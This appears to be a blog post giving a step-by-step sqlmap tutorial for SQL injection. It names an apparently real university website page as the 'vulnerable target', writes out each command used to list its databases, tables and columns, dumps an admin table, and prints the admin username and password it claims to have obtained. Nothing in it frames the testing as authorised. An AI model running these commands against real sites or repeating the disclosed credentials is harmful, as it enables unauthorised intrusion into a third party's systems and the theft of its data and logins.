SQLmap Step By Step Tutorial
Today we will see the step-by-step tutorial of Sqlmap.Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from
$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
Sqlmap is is best sql injection tool.
With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database.
It is totally a database takeover tool
Steps:
1.First we require the vulnerable target and here it is
http://www.hu.edu.pk/viewfaculty.php?id=12
2.Go to Backtrack and type cd /pentest/database/sqlmap
3.Run the sqlmap
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12
-u is the vulnerable url
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs
or
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
if you write as --dbs then it will fetch all the databases in the server
and if you write --current-db then it will fetch only the database related to the current website
we will get the database name
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables
Here after -D we have to give the database name
--tables means we are trying to fetch the tables in the current database
and we will get the table names
after that we have to fetch only the table information which we required
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
we will get the names of columns in that table with datatype
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump
now we will get the total information in the table "admin"
After finishing all the process you r having
Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123
No comments:
Post a Comment